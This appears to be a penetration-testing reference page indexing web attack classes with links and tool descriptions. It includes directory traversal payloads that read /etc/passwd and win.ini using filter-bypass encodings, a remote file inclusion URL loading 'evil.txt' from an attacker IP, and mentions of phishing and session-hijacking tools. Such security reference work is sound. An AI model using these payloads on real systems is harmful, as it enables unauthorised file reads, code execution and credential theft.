{% content-ref url="broken-authentication.md" %} broken-authentication.md {% endcontent-ref %}
Broken Links
- broken-link-checker - Find broken links, missing images, etc within your HTML.
- https://ahrefs.com/broken-link-checker
- https://brokenlinkcheck.com
- https://edoverflow.com/2017/broken-link-hijacking/
- https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d
- https://kathan19.gitbook.io/howtohunt/broken-link-hijacking/brokenlinkhijacking
Browser Attacks
- Beef - BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
- Metasploit; Browser-AutoPwn
- https://systemweakness.com/give-me-a-browser-ill-give-you-a-shell-de19811defa0?gi=a6af0aee993e
- Advanced Penetration Testing: Browser Pivoting - pg. 23
__
{% content-ref url="business-logic-flaws.md" %} business-logic-flaws.md {% endcontent-ref %}
Bypass Methodology
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md
- byp4xx - Pyhhton script for HTTP 40X responses bypassing. Features: Verb tampering, headers, #bugbountytips tricks and 2454 User-Agents.
- 403bypasser - automates the techniques used to circumvent access control restrictions on target pages.
- bypass-403 - A simple script just made for self use for bypassing 403
{% content-ref url="clickjacking.md" %} clickjacking.md {% endcontent-ref %}
{% content-ref url="command-injection.md" %} command-injection.md {% endcontent-ref %}
CORS MIsconfig
- Corsy - CORS Misconfiguration Scanner
- CORScanner - Fast CORS misconfiguration vulnerabilities scanner🍻
- CORStest - A simple CORS misconfiguration scanner
- CorsMe - Cross Origin Resource Sharing MisConfiguration Scanner
- of-CORS - Truffle Security's tool suite for identifying and exploiting CORS misconfigurations on the internal networks of bug bounty targets using typosquatting.
- https://owasp.org/www-community/attacks/CORS_RequestPreflightScrutiny
- https://owasp.org/www-community/attacks/CORS_OriginHeaderScrutiny
- https://pentestbook.six2dez.com/enumeration/web/cors
- https://kathan19.gitbook.io/howtohunt/cors/cors
- https://xsleaks.dev/ - Huge resource around cross site leak vulnerabilities
{% content-ref url="csrf.md" %} csrf.md {% endcontent-ref %}
CRLF Injection
- https://owasp.org/www-community/vulnerabilities/CRLF_Injection
- CRLF-Injection-Scanner - Command line tool for testing CRLF injection on a list of domains.
- crlfuzz A fast tool to scan CRLF vulnerability written in Go
- crlfmap - CRLFMap is a tool to find HTTP Splitting vulnerabilities
- https://pentestbook.six2dez.com/enumeration/web/crlf
Client Side Template Injection Scanner - ACSTIS helps you to scan certain web applications for AngularJS Client-Side Template Injection (sometimes referred to as CSTI, sandbox escape or sandbox bypass). It supports scanning a single request but also crawling the entire web application for the AngularJS CSTI vulnerability.
{% content-ref url="deserialization.md" %} deserialization.md {% endcontent-ref %}
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.
Basics
- Simple attack
- Linux system - ../../../etc/passwd
- Windows system ..\..\..\windows\win.ini
- Absolute path from filesystem without traversal sequences
- filename=/etc/passwd
- Nested Traversal Sequences
- ....// or ....\/ will revert when stripped
- ....//....//....//etc/passwd
- Non standard encoding
- You might be able to use various non-standard encodings, such as ..%c0%af or ..%252f, to bypass the input filter.
- ..%252f..%252f..%252fetc/passwd
- Valid start of path/base folder
- filename=/var/www/images/../../../etc/passwd
- File extension null byte bypass
- If an application requires that the user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension.
- filename=../../../etc/passwd%00.png
- dotdotpwn - DotDotPwn is a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.
Resources
{% embed url="https://youtu.be/kkSzmhJD73s" %}
File inclusion vulnerabilities allow an attacker to include a file into the applications running code. **** In order to actually exploit a file inclusion vulnerability, we must be able to not only execute code, but also to write our shell payload somewhere.
{% tabs %} {% tab title="Identification" %}
- Discovered the same way as directory transversals
- Locate parameters you can manipulate and attempt to use them to load arbitrary files
- We take it one step further and attempt to execute the contents of the file within the application
- Local file inclusions (LFI) occur when the included file is loaded from the same web server.
- Remote file inclusions (RFI) occur when a file is loaded from an external source.
- Try changing the local path parameter to a URL.
- http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt {% endtab %}
{% tab title="Tools" %}
- LFISuite - LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack
- Liffy - Local File Inclusion Exploitation tool.
- Kadimus - Kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.
- fimap - Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. {% endtab %}
{% tab title="Reference" %}
- LFI CheatSheet
- File Inclusion Vulnerability Guide
- https://xapax.github.io/security/#attacking_web_applications/local_file_inclusion/
- https://xapax.github.io/security/#attacking_web_applications/remote_file_inclusion/
- https://pentestbook.six2dez.com/enumeration/web/lfi-rfi
- Comprehensive Guide on Local File Inclusion (LFI)
- Comprehensive Guide to Remote File Inclusion (RFI)
- https://tryhackme.com/room/lfibasics {% endtab %} {% endtabs %}
File Upload
- fuxploider - File upload vulnerability scanner and exploitation tool.
- https://xapax.github.io/security/#attacking_web_applications/bypass_image_upload/
- https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html
- https://pentestbook.six2dez.com/enumeration/web/upload-bypasses
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md
- Comprehensive Guide on Unrestricted File Upload
- https://medium.com/@raymond-lind/ssrf-lfi-in-uploads-feature-321d83b93ec0
{% content-ref url="http-host-header-attacks.md" %} http-host-header-attacks.md {% endcontent-ref %}
{% content-ref url="http-request-smuggling.md" %} http-request-smuggling.md {% endcontent-ref %}
Input Fuzzing
- Wfuzz - Powerful Web application content fuzzer.
- FuzzDb - FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing.
- ffuf - A super fast web fuzzer written in Go.
- QsFuzz - Qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.
- AFLplusplus - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
{% content-ref url="insecure-direct-object-reference.md" %} insecure-direct-object-reference.md {% endcontent-ref %}
LDAP Injection
- https://owasp.org/www-community/attacks/LDAP_Injection
- https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html
- https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html#ldap-injection
- https://www.ldapexplorer.com/en/manual/109010000-ldap-filter-syntax.htm
Open Redirect Vulnerabilities
- OpenRedireX - A Fuzzer for OpenRedirect issues
- Oralyzer - Open Redirection Analyzer
- https://pentestbook.six2dez.com/enumeration/web/open-redirects
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md
- Comprehensive Guide on Open Redirect
- Open Redirect Vulnerabilities - Bug Bounty Hunting Essentials, pg.141
- ppfuzz - A fast tool to scan client-side prototype pollution vulnerability written in Rust.
Security misconfigurations include:
• Poorly configured permissions on cloud services, like S3 buckets
• Having unnecessary features enabled, like services, pages, accounts or privileges
• Default accounts with unchanged passwords
• Error messages that are overly detailed and allow an attacker to find out more about the system
• Not using HTTP security headers, or revealing too much detail in the Server: HTTP header
- hamster-sidejack - Hamster is tool or “sidejacking”. It acts as a proxy server that replaces your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions.
{% content-ref url="sql-injection/" %} sql-injection {% endcontent-ref %}
SSRF
- SSRF Bible - Ultimate Guide to SSRF vulnerabilities and attacks
- SSRF-Testing - SSRF (Server Side Request Forgery) testing resources
- Ground Control - This is a collection of scripts used to debug Server Side Request Forgery (SSRF), blind XSS, and insecure XXE processing vulnerabilities.
- SSRFire - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
- Gopherus - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
- https://tools.intigriti.io/redirector/ - SSRF payload redirect generator
- https://pentestbook.six2dez.com/enumeration/web/ssrf
- PayloadsAllTheThings/ServerSideRequestForgery
- https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
SSTI
- TPLmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
- https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
- https://akenofu.gitbook.io/hackallthethings/web-applications/attacks/ssti
- https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
- https://github.com/ambionics/symfony-exploits
- https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34
- https://tryhackme.com/room/learnssti
- Template Injection - Bug Bounty Hunting Essentials, pg.189
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
__
- https://owasp.org/www-community/attacks/XPATH_Injection
- https://owasp.org/www-community/attacks/Blind_XPath_Injection
{% content-ref url="web-cache-poisoning.md" %} web-cache-poisoning.md {% endcontent-ref %}
- Evilginx2 - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
- MITM Proxy - Mitmproxy is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols.
{% content-ref url="web-sockets.md" %} web-sockets.md {% endcontent-ref %}
{% content-ref url="xxe-xml-external-entity-attacks.md" %} xxe-xml-external-entity-attacks.md {% endcontent-ref %}
{% content-ref url="owasp-7-xss-cross-site-scripting.md" %} owasp-7-xss-cross-site-scripting.md {% endcontent-ref %}